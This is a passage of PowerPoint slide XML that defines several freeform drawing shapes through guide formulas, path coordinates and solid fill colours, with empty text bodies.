                  <a:gd name="T44" fmla="*/ 157 w 162"/>
                  <a:gd name="T45" fmla="*/ 33 h 55"/>
                  <a:gd name="T46" fmla="*/ 155 w 162"/>
                  <a:gd name="T47" fmla="*/ 35 h 55"/>
                  <a:gd name="T48" fmla="*/ 152 w 162"/>
                  <a:gd name="T49" fmla="*/ 36 h 55"/>
                  <a:gd name="T50" fmla="*/ 150 w 162"/>
                  <a:gd name="T51" fmla="*/ 39 h 55"/>
                  <a:gd name="T52" fmla="*/ 147 w 162"/>
                  <a:gd name="T53" fmla="*/ 41 h 55"/>
                  <a:gd name="T54" fmla="*/ 144 w 162"/>
                  <a:gd name="T55" fmla="*/ 43 h 55"/>
                  <a:gd name="T56" fmla="*/ 141 w 162"/>
                  <a:gd name="T57" fmla="*/ 46 h 55"/>
                  <a:gd name="T58" fmla="*/ 137 w 162"/>
                  <a:gd name="T59" fmla="*/ 48 h 55"/>
                  <a:gd name="T60" fmla="*/ 135 w 162"/>
                  <a:gd name="T61" fmla="*/ 50 h 55"/>
                  <a:gd name="T62" fmla="*/ 131 w 162"/>
                  <a:gd name="T63" fmla="*/ 52 h 55"/>
                  <a:gd name="T64" fmla="*/ 128 w 162"/>
                  <a:gd name="T65" fmla="*/ 53 h 55"/>
                  <a:gd name="T66" fmla="*/ 126 w 162"/>
                  <a:gd name="T67" fmla="*/ 55 h 55"/>
                  <a:gd name="T68" fmla="*/ 0 w 162"/>
                  <a:gd name="T69" fmla="*/ 17 h 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2"/>
                  <a:gd name="T106" fmla="*/ 0 h 55"/>
                  <a:gd name="T107" fmla="*/ 162 w 162"/>
                  <a:gd name="T108" fmla="*/ 55 h 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2" h="55">
                    <a:moveTo>
                      <a:pt x="0" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10620" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1378" y="2932"/>
                <a:ext cx="57" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 57"/>
                  <a:gd name="T1" fmla="*/ 26 h 26"/>
                  <a:gd name="T2" fmla="*/ 57 w 57"/>
                  <a:gd name="T3" fmla="*/ 11 h 26"/>
                  <a:gd name="T4" fmla="*/ 25 w 57"/>
                  <a:gd name="T5" fmla="*/ 0 h 26"/>
                  <a:gd name="T6" fmla="*/ 0 w 57"/>
                  <a:gd name="T7" fmla="*/ 4 h 26"/>
                  <a:gd name="T8" fmla="*/ 0 w 57"/>
                  <a:gd name="T9" fmla="*/ 25 h 26"/>
                  <a:gd name="T10" fmla="*/ 6 w 57"/>
                  <a:gd name="T11" fmla="*/ 26 h 26"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T18" fmla="*/ 0 w 57"/>
                  <a:gd name="T19" fmla="*/ 0 h 26"/>
                  <a:gd name="T20" fmla="*/ 57 w 5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7" h="26">
                    <a:moveTo>
                      <a:pt x="6" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="001999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10621" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1227" y="2823"/>
                <a:ext cx="32" cy="122"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 32 w 32"/>
                  <a:gd name="T1" fmla="*/ 2 h 122"/>
                  <a:gd name="T2" fmla="*/ 32 w 32"/>
                  <a:gd name="T3" fmla="*/ 2 h 122"/>
                  <a:gd name="T4" fmla="*/ 31 w 32"/>
                  <a:gd name="T5" fmla="*/ 2 h 122"/>
                  <a:gd name="T6" fmla="*/ 31 w 32"/>
                  <a:gd name="T7" fmla="*/ 2 h 122"/>
                  <a:gd name="T8" fmla="*/ 29 w 32"/>
                  <a:gd name="T9" fmla="*/ 1 h 122"/>
                  <a:gd name="T10" fmla="*/ 27 w 32"/>
                  <a:gd name="T11" fmla="*/ 1 h 122"/>
                  <a:gd name="T12" fmla="*/ 26 w 32"/>
                  <a:gd name="T13" fmla="*/ 1 h 122"/>
                  <a:gd name="T14" fmla="*/ 24 w 32"/>
                  <a:gd name="T15" fmla="*/ 0 h 122"/>
                  <a:gd name="T16" fmla="*/ 22 w 32"/>
                  <a:gd name="T17" fmla="*/ 0 h 122"/>
                  <a:gd name="T18" fmla="*/ 20 w 32"/>
                  <a:gd name="T19" fmla="*/ 0 h 122"/>
                  <a:gd name="T20" fmla="*/ 18 w 32"/>
                  <a:gd name="T21" fmla="*/ 0 h 122"/>
                  <a:gd name="T22" fmla="*/ 14 w 32"/>
                  <a:gd name="T23" fmla="*/ 0 h 122"/>
                  <a:gd name="T24" fmla="*/ 12 w 32"/>
                  <a:gd name="T25" fmla="*/ 0 h 122"/>
                  <a:gd name="T26" fmla="*/ 10 w 32"/>
                  <a:gd name="T27" fmla="*/ 1 h 122"/>
                  <a:gd name="T28" fmla="*/ 6 w 32"/>
                  <a:gd name="T29" fmla="*/ 2 h 122"/>
                  <a:gd name="T30" fmla="*/ 4 w 32"/>
                  <a:gd name="T31" fmla="*/ 3 h 122"/>
                  <a:gd name="T32" fmla="*/ 0 w 32"/>
                  <a:gd name="T33" fmla="*/ 5 h 122"/>
                  <a:gd name="T34" fmla="*/ 0 w 32"/>
                  <a:gd name="T35" fmla="*/ 122 h 122"/>
                  <a:gd name="T36" fmla="*/ 1 w 32"/>
                  <a:gd name="T37" fmla="*/ 122 h 122"/>
                  <a:gd name="T38" fmla="*/ 1 w 32"/>
                  <a:gd name="T39" fmla="*/ 122 h 122"/>
                  <a:gd name="T40" fmla="*/ 3 w 32"/>
                  <a:gd name="T41" fmla="*/ 122 h 122"/>
                  <a:gd name="T42" fmla="*/ 4 w 32"/>
                  <a:gd name="T43" fmla="*/ 122 h 122"/>
                  <a:gd name="T44" fmla="*/ 5 w 32"/>
                  <a:gd name="T45" fmla="*/ 122 h 122"/>
                  <a:gd name="T46" fmla="*/ 7 w 32"/>
                  <a:gd name="T47" fmla="*/ 121 h 122"/>
                  <a:gd name="T48" fmla="*/ 8 w 32"/>
                  <a:gd name="T49" fmla="*/ 121 h 122"/>
                  <a:gd name="T50" fmla="*/ 11 w 32"/>
                  <a:gd name="T51" fmla="*/ 121 h 122"/>
                  <a:gd name="T52" fmla="*/ 13 w 32"/>
                  <a:gd name="T53" fmla="*/ 120 h 122"/>
                  <a:gd name="T54" fmla="*/ 15 w 32"/>
                  <a:gd name="T55" fmla="*/ 119 h 122"/>
                  <a:gd name="T56" fmla="*/ 18 w 32"/>
                  <a:gd name="T57" fmla="*/ 119 h 122"/>
                  <a:gd name="T58" fmla="*/ 21 w 32"/>
                  <a:gd name="T59" fmla="*/ 118 h 122"/>
                  <a:gd name="T60" fmla="*/ 24 w 32"/>
                  <a:gd name="T61" fmla="*/ 115 h 122"/>
                  <a:gd name="T62" fmla="*/ 26 w 32"/>
                  <a:gd name="T63" fmla="*/ 114 h 122"/>
                  <a:gd name="T64" fmla="*/ 29 w 32"/>
                  <a:gd name="T65" fmla="*/ 113 h 122"/>
                  <a:gd name="T66" fmla="*/ 32 w 32"/>
                  <a:gd name="T67" fmla="*/ 111 h 122"/>
                  <a:gd name="T68" fmla="*/ 32 w 32"/>
                  <a:gd name="T69" fmla="*/ 2 h 12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
                  <a:gd name="T106" fmla="*/ 0 h 122"/>
                  <a:gd name="T107" fmla="*/ 32 w 32"/>
                  <a:gd name="T108" fmla="*/ 122 h 12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 h="122">
                    <a:moveTo>
                      <a:pt x="32" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="7FBFBF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10622" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1228" y="2824"/>
                <a:ext cx="27" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 27"/>
                  <a:gd name="T1" fmla="*/ 2 h 104"/>
                  <a:gd name="T2" fmla="*/ 27 w 27"/>
                  <a:gd name="T3" fmla="*/ 2 h 104"/>
                  <a:gd name="T4" fmla="*/ 26 w 27"/>
                  <a:gd name="T5" fmla="*/ 2 h 104"/>
                  <a:gd name="T6" fmla="*/ 26 w 27"/>
                  <a:gd name="T7" fmla="*/ 1 h 104"/>
                  <a:gd name="T8" fmla="*/ 25 w 27"/>
                  <a:gd name="T9" fmla="*/ 1 h 104"/>
                  <a:gd name="T10" fmla="*/ 24 w 27"/>
                  <a:gd name="T11" fmla="*/ 1 h 104"/>
                  <a:gd name="T12" fmla="*/ 23 w 27"/>
                  <a:gd name="T13" fmla="*/ 0 h 104"/>
                  <a:gd name="T14" fmla="*/ 20 w 27"/>
                  <a:gd name="T15" fmla="*/ 0 h 104"/>
                  <a:gd name="T16" fmla="*/ 19 w 27"/>
                  <a:gd name="T17" fmla="*/ 0 h 104"/>
                  <a:gd name="T18" fmla="*/ 17 w 27"/>
                  <a:gd name="T19" fmla="*/ 0 h 104"/>
                  <a:gd name="T20" fmla="*/ 14 w 27"/>
                  <a:gd name="T21" fmla="*/ 0 h 104"/>
                  <a:gd name="T22" fmla="*/ 12 w 27"/>
                  <a:gd name="T23" fmla="*/ 0 h 104"/>
                  <a:gd name="T24" fmla="*/ 10 w 27"/>
                  <a:gd name="T25" fmla="*/ 0 h 104"/>
                  <a:gd name="T26" fmla="*/ 9 w 27"/>
                  <a:gd name="T27" fmla="*/ 1 h 104"/>
                  <a:gd name="T28" fmla="*/ 5 w 27"/>
                  <a:gd name="T29" fmla="*/ 2 h 104"/>
                  <a:gd name="T30" fmla="*/ 3 w 27"/>
                  <a:gd name="T31" fmla="*/ 3 h 104"/>
                  <a:gd name="T32" fmla="*/ 0 w 27"/>
                  <a:gd name="T33" fmla="*/ 4 h 104"/>
                  <a:gd name="T34" fmla="*/ 0 w 27"/>
                  <a:gd name="T35" fmla="*/ 104 h 104"/>
                  <a:gd name="T36" fmla="*/ 0 w 27"/>
                  <a:gd name="T37" fmla="*/ 104 h 104"/>
                  <a:gd name="T38" fmla="*/ 2 w 27"/>
                  <a:gd name="T39" fmla="*/ 104 h 104"/>
                  <a:gd name="T40" fmla="*/ 2 w 27"/>
                  <a:gd name="T41" fmla="*/ 103 h 104"/>
                  <a:gd name="T42" fmla="*/ 3 w 27"/>
                  <a:gd name="T43" fmla="*/ 103 h 104"/>
                  <a:gd name="T44" fmla="*/ 4 w 27"/>
                  <a:gd name="T45" fmla="*/ 103 h 104"/>
                  <a:gd name="T46" fmla="*/ 6 w 27"/>
                  <a:gd name="T47" fmla="*/ 103 h 104"/>
                  <a:gd name="T48" fmla="*/ 7 w 27"/>
                  <a:gd name="T49" fmla="*/ 103 h 104"/>
                  <a:gd name="T50" fmla="*/ 10 w 27"/>
                  <a:gd name="T51" fmla="*/ 101 h 104"/>
                  <a:gd name="T52" fmla="*/ 11 w 27"/>
                  <a:gd name="T53" fmla="*/ 101 h 104"/>
                  <a:gd name="T54" fmla="*/ 13 w 27"/>
                  <a:gd name="T55" fmla="*/ 100 h 104"/>
                  <a:gd name="T56" fmla="*/ 16 w 27"/>
                  <a:gd name="T57" fmla="*/ 99 h 104"/>
                  <a:gd name="T58" fmla="*/ 18 w 27"/>
                  <a:gd name="T59" fmla="*/ 99 h 104"/>
                  <a:gd name="T60" fmla="*/ 20 w 27"/>
                  <a:gd name="T61" fmla="*/ 98 h 104"/>
                  <a:gd name="T62" fmla="*/ 23 w 27"/>
                  <a:gd name="T63" fmla="*/ 97 h 104"/>
                  <a:gd name="T64" fmla="*/ 25 w 27"/>
                  <a:gd name="T65" fmla="*/ 94 h 104"/>
                  <a:gd name="T66" fmla="*/ 27 w 27"/>
                  <a:gd name="T67" fmla="*/ 93 h 104"/>
                  <a:gd name="T68" fmla="*/ 27 w 27"/>
                  <a:gd name="T69" fmla="*/ 2 h 1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
                  <a:gd name="T106" fmla="*/ 0 h 104"/>
                  <a:gd name="T107" fmla="*/ 27 w 27"/>
                  <a:gd name="T108" fmla="*/ 104 h 10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 h="104">
                    <a:moveTo>
                      <a:pt x="27" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="93CCCC"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10623" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1230" y="2825"/>
                <a:ext cx="22" cy="84"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 22"/>
                  <a:gd name="T1" fmla="*/ 1 h 84"/>
                  <a:gd name="T2" fmla="*/ 22 w 22"/>
                  <a:gd name="T3" fmla="*/ 1 h 84"/>
                  <a:gd name="T4" fmla="*/ 21 w 22"/>
                  <a:gd name="T5" fmla="*/ 1 h 84"/>
                  <a:gd name="T6" fmla="*/ 21 w 22"/>
                  <a:gd name="T7" fmla="*/ 1 h 84"/>
                  <a:gd name="T8" fmla="*/ 19 w 22"/>
                  <a:gd name="T9" fmla="*/ 1 h 84"/>
                  <a:gd name="T10" fmla="*/ 18 w 22"/>
                  <a:gd name="T11" fmla="*/ 0 h 84"/>
                  <a:gd name="T12" fmla="*/ 17 w 22"/>
                  <a:gd name="T13" fmla="*/ 0 h 84"/>
                  <a:gd name="T14" fmla="*/ 16 w 22"/>
                  <a:gd name="T15" fmla="*/ 0 h 84"/>
                  <a:gd name="T16" fmla="*/ 15 w 22"/>
                  <a:gd name="T17" fmla="*/ 0 h 84"/>
                  <a:gd name="T18" fmla="*/ 14 w 22"/>
                  <a:gd name="T19" fmla="*/ 0 h 84"/>
                  <a:gd name="T20" fmla="*/ 11 w 22"/>
                  <a:gd name="T21" fmla="*/ 0 h 84"/>
                  <a:gd name="T22" fmla="*/ 9 w 22"/>
                  <a:gd name="T23" fmla="*/ 0 h 84"/>
                  <a:gd name="T24" fmla="*/ 8 w 22"/>
                  <a:gd name="T25" fmla="*/ 0 h 84"/>
                  <a:gd name="T26" fmla="*/ 5 w 22"/>
                  <a:gd name="T27" fmla="*/ 0 h 84"/>
                  <a:gd name="T28" fmla="*/ 3 w 22"/>
                  <a:gd name="T29" fmla="*/ 1 h 84"/>
                  <a:gd name="T30" fmla="*/ 2 w 22"/>
                  <a:gd name="T31" fmla="*/ 2 h 84"/>
                  <a:gd name="T32" fmla="*/ 0 w 22"/>
                  <a:gd name="T33" fmla="*/ 3 h 84"/>
                  <a:gd name="T34" fmla="*/ 0 w 22"/>
                  <a:gd name="T35" fmla="*/ 84 h 84"/>
                  <a:gd name="T36" fmla="*/ 0 w 22"/>
                  <a:gd name="T37" fmla="*/ 84 h 84"/>
                  <a:gd name="T38" fmla="*/ 0 w 22"/>
                  <a:gd name="T39" fmla="*/ 84 h 84"/>
                  <a:gd name="T40" fmla="*/ 1 w 22"/>
                  <a:gd name="T41" fmla="*/ 84 h 84"/>
                  <a:gd name="T42" fmla="*/ 2 w 22"/>
                  <a:gd name="T43" fmla="*/ 84 h 84"/>
                  <a:gd name="T44" fmla="*/ 3 w 22"/>
                  <a:gd name="T45" fmla="*/ 84 h 84"/>
                  <a:gd name="T46" fmla="*/ 4 w 22"/>
                  <a:gd name="T47" fmla="*/ 83 h 84"/>
                  <a:gd name="T48" fmla="*/ 5 w 22"/>
                  <a:gd name="T49" fmla="*/ 83 h 84"/>
                  <a:gd name="T50" fmla="*/ 7 w 22"/>
                  <a:gd name="T51" fmla="*/ 83 h 84"/>
                  <a:gd name="T52" fmla="*/ 9 w 22"/>
                  <a:gd name="T53" fmla="*/ 82 h 84"/>
                  <a:gd name="T54" fmla="*/ 10 w 22"/>
                  <a:gd name="T55" fmla="*/ 82 h 84"/>
                  <a:gd name="T56" fmla="*/ 12 w 22"/>
                  <a:gd name="T57" fmla="*/ 81 h 84"/>
                  <a:gd name="T58" fmla="*/ 14 w 22"/>
                  <a:gd name="T59" fmla="*/ 81 h 84"/>
                  <a:gd name="T60" fmla="*/ 16 w 22"/>
                  <a:gd name="T61" fmla="*/ 79 h 84"/>
                  <a:gd name="T62" fmla="*/ 18 w 22"/>
                  <a:gd name="T63" fmla="*/ 78 h 84"/>
                  <a:gd name="T64" fmla="*/ 19 w 22"/>
                  <a:gd name="T65" fmla="*/ 77 h 84"/>
                  <a:gd name="T66" fmla="*/ 22 w 22"/>
                  <a:gd name="T67" fmla="*/ 76 h 84"/>
                  <a:gd name="T68" fmla="*/ 22 w 22"/>
                  <a:gd name="T69" fmla="*/ 1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
                  <a:gd name="T106" fmla="*/ 0 h 84"/>
                  <a:gd name="T107" fmla="*/ 22 w 22"/>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 h="84">
                    <a:moveTo>
                      <a:pt x="22" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="78"/>
                    </a:lnTo>
